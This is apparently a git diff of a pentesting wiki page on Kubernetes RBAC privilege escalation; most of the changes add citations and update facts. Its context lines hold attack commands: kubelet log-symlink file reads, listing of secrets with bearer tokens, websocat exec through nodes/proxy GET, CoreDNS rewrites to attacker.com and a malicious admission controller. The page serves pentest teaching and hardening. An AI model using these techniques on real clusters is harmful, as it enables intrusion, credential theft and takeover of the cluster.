-- If the attacker controls any principal with the **permissions to read `nodes/log`**, he can just create a **symlink** in `/host-mounted/var/log/sym` to `/` and when **accessing `https://<gateway>:10250/logs/sym/` he will lists the hosts root** filesystem (changing the symlink can provide access to files).
+- If the attacker controls any principal with the **permissions to read `nodes/log`**, he can just create a **symlink** in `/host-mounted/var/log/sym` to `/` and when **accessing `https://<gateway>:10250/logs/sym/` he will lists the hosts root** filesystem (changing the symlink can provide access to files).<sup>[[20]](#references)[[21]](#references)[[29]](#references)</sup>
 
 ```bash
 curl -k -H 'Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Im[...]' 'https://172.17.0.1:10250/logs/sym/'
@@ -258,11 +258,11 @@ curl -k -H 'Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Im[...]' 'https://
 [...]
 ```
 
-**A laboratory and automated exploit can be found in** [**https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts**](https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts)
+**A laboratory and automated exploit can be found in** [**https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts**](https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts)<sup>[[21]](#references)</sup>
 
 #### Bypassing readOnly protection <a href="#bypassing-hostpath-readonly-protection" id="bypassing-hostpath-readonly-protection"></a>
 
-If you are lucky enough and the highly privileged capability capability `CAP_SYS_ADMIN` is available, you can just remount the folder as rw:
+If you are lucky enough and the highly privileged capability capability `CAP_SYS_ADMIN` is available, you can just remount the folder as rw:<sup>[[13]](#references)</sup>
 
 ```bash
 mount -o rw,remount /hostlogs/
@@ -270,7 +270,7 @@ mount -o rw,remount /hostlogs/
 
 #### Bypassing hostPath readOnly protection <a href="#bypassing-hostpath-readonly-protection" id="bypassing-hostpath-readonly-protection"></a>
 
-As stated in [**this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html) it’s possible to bypass the protection:
+As stated in [**this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html) it’s possible to bypass the protection:<sup>[[15]](#references)[[16]](#references)[[20]](#references)</sup>
 
 ```yaml
 allowedHostPaths:
@@ -328,7 +328,7 @@ spec:
 
 ### **Impersonating privileged accounts**
 
-With a [**user impersonation**](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) privilege, an attacker could impersonate a privileged account.
+With a [**user impersonation**](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) privilege, an attacker could impersonate a privileged account.<sup>[[22]](#references)</sup>
 
 Just use the parameter `--as=<username>` in the `kubectl` command to impersonate a user, or `--as-group=<group>` to impersonate a group:
 
@@ -349,7 +349,7 @@ https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
 
 ### Listing Secrets
 
-The permission to **list secrets could allow an attacker to actually read the secrets** accessing the REST API endpoint:
+The permission to **list secrets could allow an attacker to actually read the secrets** accessing the REST API endpoint:<sup>[[11]](#references)</sup>
 
 ```bash
 curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
@@ -357,9 +357,9 @@ curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1
 
 ### Creating and Reading Secrets
 
-There is a special kind of Kubernetes Secret of type **kubernetes.io/service-account-token** which stores service account tokens. Modern Kubernetes versions do **not** automatically create one long-lived Secret for every ServiceAccount; projected, bound TokenRequest tokens are the normal workload path. However, manually created service account token Secrets are still supported, and upgraded or legacy clusters may still contain long-lived token Secrets. Current clusters can also mark unused auto-generated legacy token Secrets invalid and eventually clean them up, leaving labels such as `kubernetes.io/legacy-token-invalid-since` and `kubernetes.io/legacy-token-last-used`.
+There is a special kind of Kubernetes Secret of type **kubernetes.io/service-account-token** which stores service account tokens. Modern Kubernetes versions do **not** automatically create one long-lived Secret for every ServiceAccount; projected, bound TokenRequest tokens are the normal workload path. However, manually created service account token Secrets are still supported, and upgraded or legacy clusters may still contain long-lived token Secrets. Current clusters can also mark unused auto-generated legacy token Secrets invalid and eventually clean them up, leaving labels such as `kubernetes.io/legacy-token-invalid-since` and `kubernetes.io/legacy-token-last-used`.<sup>[[10]](#references)[[11]](#references)[[42]](#references)</sup>
 
-If you have permissions to create and read secrets, and you also know the serviceaccount's name, you can create a secret as follows and then steal the victim serviceaccount's token from it:
+If you have permissions to create and read secrets, and you also know the serviceaccount's name, you can create a secret as follows and then steal the victim serviceaccount's token from it. The control plane populates a manually created token Secret linked to that ServiceAccount.<sup>[[11]](#references)[[42]](#references)</sup>
 
 ```yaml
 apiVersion: v1
@@ -427,13 +427,13 @@ Note that if you are allowed to create and read secrets in a certain namespace, 
 
 ### Reading a secret – brute-forcing token IDs
 
-While an attacker in possession of a token with read permissions requires the exact name of the secret to use it, unlike the broader _**listing secrets**_ privilege, there are still vulnerabilities. Default service accounts in the system can be enumerated, each associated with a secret. These secrets have a name structure: a static prefix followed by a random five-character alphanumeric token (excluding certain characters) according to the [source code](https://github.com/kubernetes/kubernetes/blob/8418cccaf6a7307479f1dfeafb0d2823c1c37802/staging/src/k8s.io/apimachinery/pkg/util/rand/rand.go#L83).
+While an attacker in possession of a token with read permissions requires the exact name of the secret to use it, unlike the broader _**listing secrets**_ privilege, there are still vulnerabilities. On legacy or pre-v1.24 clusters, default service accounts may have associated long-lived Secrets that can be enumerated; modern clusters normally use projected TokenRequest tokens instead, so this path applies only where those legacy Secrets still exist. These legacy Secrets have a name structure: a static prefix followed by a random five-character alphanumeric token (excluding certain characters) according to the [source code](https://github.com/kubernetes/kubernetes/blob/8418cccaf6a7307479f1dfeafb0d2823c1c37802/staging/src/k8s.io/apimachinery/pkg/util/rand/rand.go#L83).<sup>[[10]](#references)[[23]](#references)[[42]](#references)</sup>
 
-The token is generated from a limited 27-character set (`bcdfghjklmnpqrstvwxz2456789`), rather than the full alphanumeric range. This limitation reduces the total possible combinations to 14,348,907 (27^5). Consequently, an attacker could feasibly execute a brute-force attack to deduce the token in a matter of hours, potentially leading to privilege escalation by accessing sensitive service accounts.
+The token is generated from a limited 27-character set (`bcdfghjklmnpqrstvwxz2456789`), rather than the full alphanumeric range. This limitation reduces the total possible combinations to 14,348,907 (27^5). Consequently, an attacker could feasibly execute a brute-force attack to deduce the token in a matter of hours, potentially leading to privilege escalation by accessing sensitive service accounts.<sup>[[23]](#references)</sup>
 
 ### EncrpytionConfiguration in clear text
 
-It's possible to find clear text keys to encrypt data at rest in this type of object like:
+It's possible to find clear text keys to encrypt data at rest in this type of object, like the following example. The `identity` provider stores matching resources as plaintext, while configured encryption providers and their keys are read from the `EncryptionConfiguration` file.<sup>[[24]](#references)</sup>
 
 ```yaml
 # From https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/
@@ -495,9 +495,9 @@ resources:
 
 ### Certificate Signing Requests
 
-If you have the verbs **`create`** in the resource `certificatesigningrequests` ( or at least in `certificatesigningrequests/nodeClient`). You can **create** a new CeSR of a **new node.**
+If you have the verbs **`create`** in the resource `certificatesigningrequests` ( or at least in `certificatesigningrequests/nodeClient`). You can **create** a new CeSR of a **new node.**<sup>[[26]](#references)</sup>
 
-According to the [documentation it's possible to auto approve this requests](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-tls-bootstrapping/), so in that case you **don't need extra permissions**. If not, you would need to be able to approve the request, which means update in `certificatesigningrequests/approval` and `approve` in `signers` with resourceName `<signerNameDomain>/<signerNamePath>` or `<signerNameDomain>/*`
+According to the [documentation it's possible to auto approve this requests](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-tls-bootstrapping/), so in that case you **don't need extra permissions**. If not, you would need to be able to approve the request, which means update in `certificatesigningrequests/approval` and `approve` in `signers` with resourceName `<signerNameDomain>/<signerNamePath>` or `<signerNameDomain>/*`.<sup>[[25]](#references)[[26]](#references)</sup>
 
 An **example of a role** with all the required permissions is:
 
@@ -532,10 +532,10 @@ rules:
       - approve
 ```
 
-So, with the new node CSR approved, you can **abuse** the special permissions of nodes to **steal secrets** and **escalate privileges**.
+So, with the new node CSR approved, you can **abuse** the special permissions of nodes to **steal secrets** and **escalate privileges**.<sup>[[26]](#references)</sup>
 
-In [**this post**](https://www.4armed.com/blog/hacking-kubelet-on-gke/) and [**this one**](https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-privilege-escalation/) the GKE K8s TLS Bootstrap configuration is configured with **automatic signing** and it's abused to generate credentials of a new K8s Node and then abuse those to escalate privileges by stealing secrets.\
-If you **have the mentioned privileges yo could do the same thing**. Note that the first example bypasses the error preventing a new node to access secrets inside containers because a **node can only access the secrets of containers mounted on it.**
+In [**this post**](https://www.4armed.com/blog/hacking-kubelet-on-gke/) and [**this one**](https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-privilege-escalation/) the GKE K8s TLS Bootstrap configuration is configured with **automatic signing** and it's abused to generate credentials of a new K8s Node and then abuse those to escalate privileges by stealing secrets.<sup>[[27]](#references)[[28]](#references)</sup>\
+If you **have the mentioned privileges yo could do the same thing**. Note that the first example bypasses the error preventing a new node to access secrets inside containers because a **node can only access the secrets of containers mounted on it.**<sup>[[26]](#references)[[27]](#references)[[28]](#references)</sup>
 
 The way to bypass this is just to **create a node credentials for the node name where the container with the interesting secrets is mounted** (but just check how to do it in the first post):
 
@@ -545,8 +545,8 @@ The way to bypass this is just to **create a node credentials for the node name 
 
 ### AWS EKS aws-auth configmaps
 
-Principals that can modify **`configmaps`** in the kube-system namespace on EKS (need to be in AWS) clusters can obtain cluster admin privileges by overwriting the **aws-auth** configmap.\
-The verbs needed are **`update`** and **`patch`**, or **`create`** if configmap wasn't created:
+In the legacy ConfigMap-based EKS authentication mode, principals that can modify **`configmaps`** in the kube-system namespace on EKS (need to be in AWS) clusters can obtain cluster admin privileges by overwriting the **aws-auth** configmap. EKS now recommends access entries for cluster access, but clusters that still use `aws-auth` remain exposed to this configuration risk.<sup>[[30]](#references)[[31]](#references)</sup>\
+The verbs needed are **`update`** and **`patch`**, or **`create`** if configmap wasn't created:<sup>[[30]](#references)</sup>
 
 ```bash
 # Check if config map exists
@@ -595,7 +595,7 @@ data:
 
 ### CoreDNS config map
 
-If you have the permissions to modify the **`coredns` configmap** in the `kube-system` namespace, you can modify the address domains will be resolved to in order to be able to perform MitM attacks to **steal sensitive information or inject malicious content**.
+If you have the permissions to modify the **`coredns` configmap** in the `kube-system` namespace, you can modify the address domains will be resolved to in order to be able to perform MitM attacks to **steal sensitive information or inject malicious content**.<sup>[[4]](#references)</sup>
 
 The verbs needed are **`update`** and **`patch`** over the **`coredns`** configmap (or all the config maps).
 
@@ -631,13 +631,13 @@ data:
     }
 ```
 
-An attacker could download it running `kubectl get configmap coredns -n kube-system -o yaml`, modify it adding something like `rewrite name victim.com attacker.com` so whenever `victim.com` is accessed actually `attacker.com` is the domain that is going to be accessed. And then apply it running `kubectl apply -f poison_dns.yaml`.
+An attacker could download it running `kubectl get configmap coredns -n kube-system -o yaml`, modify it adding something like `rewrite name victim.com attacker.com` so whenever `victim.com` is accessed actually `attacker.com` is the domain that is going to be accessed. And then apply it running `kubectl apply -f poison_dns.yaml`.<sup>[[4]](#references)</sup>
 
 Another option is to just edit the file running `kubectl edit configmap coredns -n kube-system` and making changes.
 
 ### Escalating in GKE
 
-There are **2 ways to assign K8s permissions to GCP principals**. In any case the principal also needs the permission **`container.clusters.get`** to be able to gather credentials to access the cluster, or you will need to **generate your own kubectl config file** (follow the next link).
+There are **2 ways to assign K8s permissions to GCP principals**. For the Google Cloud API path, the principal needs both **`container.clusters.get`** and **`container.clusters.getCredentials`** to obtain cluster credentials, or you will need to **generate your own kubectl config file** (follow the next link).<sup>[[32]](#references)</sup>
 
 > [!WARNING]
 > When talking to the K8s api endpoint, the **GCP auth token will be sent**. Then, GCP, through the K8s api endpoint, will first **check if the principal** (by email) **has any access inside the cluster**, then it will check if it has **any access via GCP IAM**.\
@@ -653,26 +653,26 @@ The second method is **assigning K8s permissions inside the cluster** to the ide
 
 ### Create serviceaccounts token
 
-Principals that can **create TokenRequests** (`serviceaccounts/token`) When talking to the K8s api endpoint SAs (info from [**here**](https://github.com/PaloAltoNetworks/rbac-police/blob/main/lib/token_request.rego)).
+Principals that can **create TokenRequests** (`serviceaccounts/token`) can mint a time-bound token for a ServiceAccount; the risk is highest when the target account has privileged RBAC permissions (info from [**here**](https://github.com/PaloAltoNetworks/rbac-police/blob/main/lib/token_request.rego)).<sup>[[10]](#references)[[33]](#references)</sup>
 
 ### ephemeralcontainers
 
-Principals that can **`update`** or **`patch`** **`pods/ephemeralcontainers`** can gain **code execution on other pods**, and potentially **break out** to their node by adding an ephemeral container with a privileged securityContext
+Principals that can **`update`** or **`patch`** **`pods/ephemeralcontainers`** can gain **code execution on other pods**, and potentially **break out** to their node by adding an ephemeral container with a privileged securityContext. The subresource is specifically handled by the `ephemeralcontainers` API handler and permits commands in an existing Pod.<sup>[[12]](#references)[[34]](#references)</sup>
 
 ### ValidatingWebhookConfigurations or MutatingWebhookConfigurations
 
-Principals with any of the verbs `create`, `update` or `patch` over `validatingwebhookconfigurations` or `mutatingwebhookconfigurations` might be able to **create one of such webhookconfigurations** in order to be able to **escalate privileges**.
+Principals with any of the verbs `create`, `update` or `patch` over `validatingwebhookconfigurations` or `mutatingwebhookconfigurations` might be able to **create one of such webhookconfigurations** in order to be able to **escalate privileges**. These dynamic configurations register admission webhooks; mutating webhooks can change an object before persistence.<sup>[[35]](#references)</sup>
 
 For a [`mutatingwebhookconfigurations` example check this section of this post](#malicious-admission-controller).
 
 ### Escalate
 
-As you can read in the next section: [**Built-in Privileged Escalation Prevention**](#built-in-privileged-escalation-prevention), a principal cannot update neither create roles or clusterroles without having himself those new permissions. Except if he has the **verb `escalate` or `*`** over **`roles`** or **`clusterroles`** and the respective binding options.\
-Then he can update/create new roles, clusterroles with better permissions than the ones he has.
+As you can read in the next section: [**Built-in Privileged Escalation Prevention**](#built-in-privileged-escalation-prevention), a principal cannot update neither create roles or clusterroles without having himself those new permissions. Except if he has the **verb `escalate` or `*`** over **`roles`** or **`clusterroles`** and the respective binding options.<sup>[[9]](#references)</sup>\
+Then he can update/create new roles, clusterroles with better permissions than the ones he has.<sup>[[9]](#references)</sup>
 
 ### Nodes proxy
 
-Principals with access to the **`nodes/proxy`** subresource can **execute code on pods** via the Kubelet API (according to [**this**](https://github.com/PaloAltoNetworks/rbac-police/blob/main/lib/nodes_proxy.rego)). More information about Kubelet authentication in this page:
+Principals with access to the **`nodes/proxy`** subresource can **execute code on pods** via the Kubelet API (according to [**this**](https://github.com/PaloAltoNetworks/rbac-police/blob/main/lib/nodes_proxy.rego)). More information about Kubelet authentication in this page:<sup>[[29]](#references)[[37]](#references)</sup>
 
 {{#ref}}
 ../pentesting-kubernetes-services/kubelet-authentication-and-authorization.md
@@ -680,12 +680,12 @@ Principals with access to the **`nodes/proxy`** subresource can **execute code o
 
 #### nodes/proxy GET -> Kubelet /exec via WebSocket verb confusion
 
-- Kubelet maps HTTP methods to RBAC verbs **before** protocol upgrade. WebSocket handshakes must start with **HTTP GET** (`Connection: Upgrade`), so `/exec` over WebSocket is checked as **verb `get`** instead of the expected `create`.
-- `/exec`, `/run`, `/attach`, and `/portforward` are not explicitly mapped and fall into the default **`proxy`** subresource, so the authorization question becomes **`can <user> get nodes/proxy?`**
-- If a token only has **`nodes/proxy` + `get`**, direct WebSocket access to the kubelet on `https://<node_ip>:10250` allows arbitrary command execution in any pod on that node. The same request via the API server proxy path (`/api/v1/nodes/<node>/proxy/exec/...`) is denied because it is a normal HTTP POST and maps to `create`.
-- The kubelet performs no second authorization after the WebSocket upgrade; only the initial GET is evaluated.
+- Kubelet maps HTTP methods to RBAC verbs **before** protocol upgrade. WebSocket handshakes must start with **HTTP GET** (`Connection: Upgrade`), so `/exec` over WebSocket is checked as **verb `get`** instead of the expected `create`.<sup>[[6]](#references)[[29]](#references)</sup>
+- `/exec`, `/run`, `/attach`, and `/portforward` are not explicitly mapped and fall into the default **`proxy`** subresource, so the authorization question becomes **`can <user> get nodes/proxy?`**<sup>[[6]](#references)[[29]](#references)</sup>
+- If a token only has **`nodes/proxy` + `get`**, direct WebSocket access to the kubelet on `https://<node_ip>:10250` allows arbitrary command execution in any pod on that node. The same request via the API server proxy path (`/api/v1/nodes/<node>/proxy/exec/...`) is denied because it is a normal HTTP POST and maps to `create`.<sup>[[6]](#references)[[29]](#references)</sup>
+- The kubelet performs no second authorization after the WebSocket upgrade; only the initial GET is evaluated.<sup>[[6]](#references)[[29]](#references)</sup>
 
-**Direct exploit (requires network reachability to the kubelet and a token with `nodes/proxy` GET):**
+**Direct exploit (requires network reachability to the kubelet and a token with `nodes/proxy` GET):**<sup>[[6]](#references)[[8]](#references)</sup>
 
 ```bash
 kubectl auth can-i --list | grep "nodes/proxy"
@@ -695,9 +695,9 @@ websocat --insecure \
   "wss://$NODE_IP:10250/exec/$NAMESPACE/$POD/$CONTAINER?output=1&error=1&command=id"
 ```
 
-- Use the **Node IP**, not the node name. The same request with `curl -X POST` will be **Forbidden** because it maps to `create`.
-- Direct kubelet access bypasses the API server, so AuditPolicy only shows `subjectaccessreviews` from the kubelet user agent and **does not log `pods/exec`** commands.
-- Enumerate affected service accounts with the [detection script](https://gist.github.com/grahamhelton/f5c8ce265161990b0847ac05a74e466a) to find tokens limited to `nodes/proxy` GET.
+- Use the **Node IP**, not the node name. The same request with `curl -X POST` will be **Forbidden** because it maps to `create`.<sup>[[6]](#references)</sup>
+- Direct kubelet access bypasses the API server, so AuditPolicy only shows `subjectaccessreviews` from the kubelet user agent and **does not log `pods/exec`** commands.<sup>[[6]](#references)</sup>
+- Enumerate affected service accounts with the [detection script](https://gist.github.com/grahamhelton/f5c8ce265161990b0847ac05a74e466a) to find tokens limited to `nodes/proxy` GET.<sup>[[7]](#references)</sup>
 
 ### Delete pods + unschedulable nodes
 
@@ -716,7 +716,7 @@ kubectl delete pods -n kube-system <privileged_pod_name>
 
 ### Services status (CVE-2020-8554)
 
-Principals that can **modify** **`services/status`** may set the `status.loadBalancer.ingress.ip` field to exploit the **unfixed CVE-2020-8554** and launch **MiTM attacks against the clus**ter. Most mitigations for CVE-2020-8554 only prevent ExternalIP services (according to [**this**](https://github.com/PaloAltoNetworks/rbac-police/blob/main/lib/modify_service_status_cve_2020_8554.rego)).
+Principals that can **modify** **`services/status`** may set the `status.loadBalancer.ingress.ip` field to exploit the **unfixed CVE-2020-8554** and launch **MiTM attacks against the clus**ter. Most mitigations for CVE-2020-8554 only prevent ExternalIP services (according to [**this**](https://github.com/PaloAltoNetworks/rbac-police/blob/main/lib/modify_service_status_cve_2020_8554.rego)).<sup>[[38]](#references)[[39]](#references)</sup>
 
 ### Nodes and Pods status
 
@@ -724,21 +724,21 @@ Principals with **`update`** or **`patch`** permissions over `nodes/status` or `
 
 ## Built-in Privileged Escalation Prevention
 
-Kubernetes has a [built-in mechanism](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#privilege-escalation-prevention-and-bootstrapping) to prevent privilege escalation.
+Kubernetes has a [built-in mechanism](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#privilege-escalation-prevention-and-bootstrapping) to prevent privilege escalation.<sup>[[9]](#references)</sup>
 
-This system ensures that **users cannot elevate their privileges by modifying roles or role bindings**. The enforcement of this rule occurs at the API level, providing a safeguard even when the RBAC authorizer is inactive.
+This system ensures that **users cannot elevate their privileges by modifying roles or role bindings**. The enforcement of this rule occurs at the API level, providing a safeguard even when the RBAC authorizer is inactive.<sup>[[9]](#references)</sup>
 
-The rule stipulates that a **user can only create or update a role if they possess all the permissions the role comprises**. Moreover, the scope of the user's existing permissions must align with that of the role they are attempting to create or modify: either cluster-wide for ClusterRoles or confined to the same namespace (or cluster-wide) for Roles.
+The rule stipulates that a **user can only create or update a role if they possess all the permissions the role comprises**. Moreover, the scope of the user's existing permissions must align with that of the role they are attempting to create or modify: either cluster-wide for ClusterRoles or confined to the same namespace (or cluster-wide) for Roles.<sup>[[9]](#references)</sup>
 
 > [!WARNING]
-> There is an exception to the previous rule. If a principal has the **verb `escalate`** over **`roles`** or **`clusterroles`** he can increase the privileges of roles and clusterroles even without having the permissions himself.
+> There is an exception to the previous rule. If a principal has the **verb `escalate`** over **`roles`** or **`clusterroles`** he can increase the privileges of roles and clusterroles even without having the permissions himself.<sup>[[9]](#references)</sup>
 
 ### **Get & Patch RoleBindings/ClusterRoleBindings**
 
 > [!CAUTION]
 > **Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. Yo cannot create/modify a rolebinding to give yourself or a different SA some privileges if you don't have already.**
 
-The privilege to create Rolebindings allows a user to **bind roles to a service account**. This privilege can potentially lead to privilege escalation because it **allows the user to bind admin privileges to a compromised service account.**
+The privilege to create Rolebindings allows a user to **bind roles to a service account**. This privilege can potentially lead to privilege escalation because it **allows the user to bind admin privileges to a compromised service account.**<sup>[[9]](#references)</sup>
 
 ## Other Attacks
 
@@ -764,15 +764,15 @@ spec:
 
 For example, to backdoor an existing pod with a new container you could just add a new container in the specification. Note that you could **give more permissions** to the second container that the first won't have.
 
-More info at: [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
+More info at: [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)<sup>[[12]](#references)</sup>
 
 ### Malicious Admission Controller
 
-An admission controller **intercepts requests to the Kubernetes API server** before the persistence of the object, but **after the request is authenticated** **and authorized**.
+An admission controller **intercepts requests to the Kubernetes API server** before the persistence of the object, but **after the request is authenticated** **and authorized**.<sup>[[35]](#references)</sup>
 
-If an attacker somehow manages to **inject a Mutation Admission Controller**, he will be able to **modify already authenticated requests**. Being able to potentially privesc, and more usually persist in the cluster.
+If an attacker somehow manages to **inject a Mutation Admission Controller**, he will be able to **modify already authenticated requests**. Being able to potentially privesc, and more usually persist in the cluster.<sup>[[35]](#references)</sup>
 
-**Example from** [**https://blog.rewanthtammana.com/creating-malicious-admission-controllers**](https://blog.rewanthtammana.com/creating-malicious-admission-controllers):
+**Example from** [**https://blog.rewanthtammana.com/creating-malicious-admission-controllers**](https://blog.rewanthtammana.com/creating-malicious-admission-controllers):<sup>[[3]](#references)[[36]](#references)</sup>
 
 ```bash
 git clone https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo
@@ -820,7 +820,7 @@ patches = append(patches, patchOperation{
 })
 ```
 
-The above snippet replaces the first container image in every pod with `rewanthtammana/malicious-image`.
+The above snippet replaces the first container image in every pod with `rewanthtammana/malicious-image`.<sup>[[3]](#references)[[36]](#references)</sup>
 
 ## OPA Gatekeeper bypass
 
@@ -832,8 +832,8 @@ The above snippet replaces the first container image in every pod with `rewantht
 
 ### **Disabling Automount of Service Account Tokens**
 
-- **Pods and Service Accounts**: By default, pods mount a service account token. To enhance security, Kubernetes allows the disabling of this automount feature.
-- **How to Apply**: Set `automountServiceAccountToken: false` in the configuration of service accounts or pods starting from Kubernetes version 1.6.
+- **Pods and Service Accounts**: By default, pods mount a service account token. To enhance security, Kubernetes allows the disabling of this automount feature.<sup>[[10]](#references)[[42]](#references)</sup>
+- **How to Apply**: Set `automountServiceAccountToken: false` in the configuration of service accounts or pods starting from Kubernetes version 1.6.<sup>[[10]](#references)</sup>
 
 ### **Restrictive User Assignment in RoleBindings/ClusterRoleBindings**
 
@@ -841,7 +841,7 @@ The above snippet replaces the first container image in every pod with `rewantht
 
 ### **Namespace-Specific Roles Over Cluster-Wide Roles**
 
-- **Roles vs. ClusterRoles**: Prefer using Roles and RoleBindings for namespace-specific permissions rather than ClusterRoles and ClusterRoleBindings, which apply cluster-wide. This approach offers finer control and limits the scope of permissions.
+- **Roles vs. ClusterRoles**: Prefer using Roles and RoleBindings for namespace-specific permissions rather than ClusterRoles and ClusterRoleBindings, which apply cluster-wide. This approach offers finer control and limits the scope of permissions.<sup>[[9]](#references)</sup>
 
 ### **Use automated tools**
 
@@ -857,17 +857,53 @@ https://github.com/aquasecurity/kube-hunter
 https://github.com/aquasecurity/kube-bench
 {{#endref}}
 
-## **References**
+## References
 
-- [**https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions**](https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions)
-- [**https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1**](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1)
-- [**https://blog.rewanthtammana.com/creating-malicious-admission-controllers**](https://blog.rewanthtammana.com/creating-malicious-admission-controllers)
-- [**https://kubenomicon.com/Lateral_movement/CoreDNS_poisoning.html**](https://kubenomicon.com/Lateral_movement/CoreDNS_poisoning.html)
-- [**https://kubenomicon.com/**](https://kubenomicon.com/)
-- [nodes/proxy GET -> kubelet exec WebSocket bypass](https://grahamhelton.com/blog/nodes-proxy-rce)
-- [nodes/proxy GET detection script](https://gist.github.com/grahamhelton/f5c8ce265161990b0847ac05a74e466a)
-- [websocat](https://github.com/vi/websocat)
+- [1] [https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions](https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions)
+- [2] [https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1)
+- [3] [https://blog.rewanthtammana.com/creating-malicious-admission-controllers](https://blog.rewanthtammana.com/creating-malicious-admission-controllers)
+- [4] [https://kubenomicon.com/Lateral_movement/CoreDNS_poisoning.html](https://kubenomicon.com/Lateral_movement/CoreDNS_poisoning.html)
+- [5] [https://kubenomicon.com/](https://kubenomicon.com/)
+- [6] [nodes/proxy GET -> kubelet exec WebSocket bypass](https://grahamhelton.com/blog/nodes-proxy-rce)
+- [7] [nodes/proxy GET detection script](https://gist.github.com/grahamhelton/f5c8ce265161990b0847ac05a74e466a)
+- [8] [websocat](https://github.com/vi/websocat)
+- [9] [Role-based access control good practices](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#privilege-escalation-prevention-and-bootstrapping)
+- [10] [Service Accounts](https://kubernetes.io/docs/concepts/security/service-accounts/)
+- [11] [Secrets](https://kubernetes.io/docs/concepts/configuration/secret/)
+- [12] [Configure a Security Context for a Pod or Container](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
+- [13] [Linux kernel security constraints for Pods and containers](https://kubernetes.io/docs/concepts/security/linux-kernel-security-constraints/)
+- [14] [Pod Security Standards](https://kubernetes.io/docs/concepts/security/pod-security-standards/)
+- [15] [Volumes: hostPath](https://kubernetes.io/docs/concepts/storage/volumes/#hostpath)
+- [16] [Persistent Volumes](https://kubernetes.io/docs/concepts/storage/persistent-volumes/)
+- [17] [kubectl exec](https://kubernetes.io/docs/reference/kubectl/generated/kubectl_exec/)
+- [18] [kubectl cp](https://kubernetes.io/docs/reference/kubectl/generated/kubectl_cp/)
+- [19] [kubectl port-forward](https://kubernetes.io/docs/reference/kubectl/generated/kubectl_port-forward/)
+- [20] [Dangers of HostPath PersistentVolumes](https://jackleadford.github.io/containers/2020/03/06/pvpost.html)
+- [21] [Kubernetes Security: Pod Escape Through Log Mounts](https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts)
+- [22] [User impersonation](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation)
+- [23] [Kubernetes random string implementation](https://github.com/kubernetes/kubernetes/blob/8418cccaf6a7307479f1dfeafb0d2823c1c37802/staging/src/k8s.io/apimachinery/pkg/util/rand/rand.go#L83)
+- [24] [Encrypting Confidential Data at Rest](https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/)
+- [25] [TLS bootstrapping](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-tls-bootstrapping/)
+- [26] [Certificates and Certificate Signing Requests](https://kubernetes.io/docs/reference/access-authn-authz/certificate-signing-requests/)
+- [27] [Hacking Kubelet on Google Kubernetes Engine](https://www.4armed.com/blog/hacking-kubelet-on-gke/)
+- [28] [GKE Kubelet TLS Bootstrap Privilege Escalation](https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-privilege-escalation/)
+- [29] [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/)
+- [30] [Grant IAM users access to Kubernetes with an aws-auth ConfigMap](https://docs.aws.amazon.com/eks/latest/userguide/auth-configmap.html)
+- [31] [Grant IAM users access to Kubernetes with EKS access entries](https://docs.aws.amazon.com/eks/latest/userguide/access-entries.html)
+- [32] [GKE API permissions](https://cloud.google.com/kubernetes-engine/docs/reference/api-permissions)
+- [33] [TokenRequest RBAC rule](https://github.com/PaloAltoNetworks/rbac-police/blob/main/lib/token_request.rego)
+- [34] [Ephemeral Containers](https://kubernetes.io/docs/concepts/workloads/pods/ephemeral-containers/)
+- [35] [Dynamic Admission Control](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/)
+- [36] [malicious-admission-controller-webhook-demo](https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo)
+- [37] [nodes/proxy RBAC rule](https://github.com/PaloAltoNetworks/rbac-police/blob/main/lib/nodes_proxy.rego)
+- [38] [CVE-2020-8554 service status RBAC rule](https://github.com/PaloAltoNetworks/rbac-police/blob/main/lib/modify_service_status_cve_2020_8554.rego)
+- [39] [CVE-2020-8554](https://nvd.nist.gov/vuln/detail/CVE-2020-8554)
+- [40] [mauilion privileged pod one-liner](https://twitter.com/mauilion/status/1129468485480751104)
